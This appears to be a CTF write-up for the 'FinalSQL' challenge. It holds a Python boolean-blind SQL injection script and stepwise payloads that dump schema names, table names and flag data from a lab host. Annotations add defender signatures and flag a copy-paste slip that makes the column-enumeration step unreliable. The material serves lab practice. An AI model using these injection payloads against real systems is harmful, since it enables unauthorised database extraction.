FinalSQL
有 id 参数，长得就像盲注。
exp:
import requests
if __name__ == "__main__":
    # Boolean-based blind extraction, one character per outer iteration.
    # Each request asks "is the byte at position `pos` greater than `guess`?";
    # the script reads the answer from whether the page contains "NO! Not t"
    # (present -> treated as byte > guess, absent -> byte <= guess) and
    # narrows the [lo, hi) range by bisection over printable ASCII (32..126).
    # NOTE: there is no stop condition — all 255 positions are always probed,
    # so the tail of `recovered` past the real string length is noise.
    # From a defender's view the tell-tale signature is `information_schema`,
    # `group_concat` and `ord(substr(` inside the `id` query parameter, plus a
    # burst of near-identical requests differing only in two integers.
    recovered = ""
    for pos in range(1, 256):
        lo, hi = 32, 127
        guess = (lo + hi) // 2
        while lo < hi:
            payload = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (pos, guess)
            target = f'http://a10fc172-5571-460a-9f76-93eb2e9486fd.node3.buuoj.cn/search.php?id={payload}'
            resp = requests.get(target)
            if "NO! Not t" in resp.text:
                lo = guess + 1
            else:
                hi = guess
            guess = (lo + hi) // 2
        # Loop exits with lo == hi, so `guess` is the single remaining candidate.
        recovered += chr(guess)
        print(recovered)
爆库名
# Schema-name step: same payload as in the script above (lists schema names).
sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
爆表名
# Table-name step: lists table names within the schema named 'geek'.
sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1" % (i, mid)
爆字段
# NOTE(review): this is a verbatim copy of the schema-name payload above, not a
# column query — the writeup's "爆字段" step appears to be a copy-paste slip;
# the payload actually used for columns is not shown on this page.
sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
拿flag
# First attempt at the flag: column `fl4gawsl` of table `Flaaaaag` (the author notes below this was the wrong table).
sql = "1^(ord(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),%d,1))>%d)^1" % (i, mid)
然后发现爆错表了2333......
# Second attempt: column `password` of table `F1naI1y`.
sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)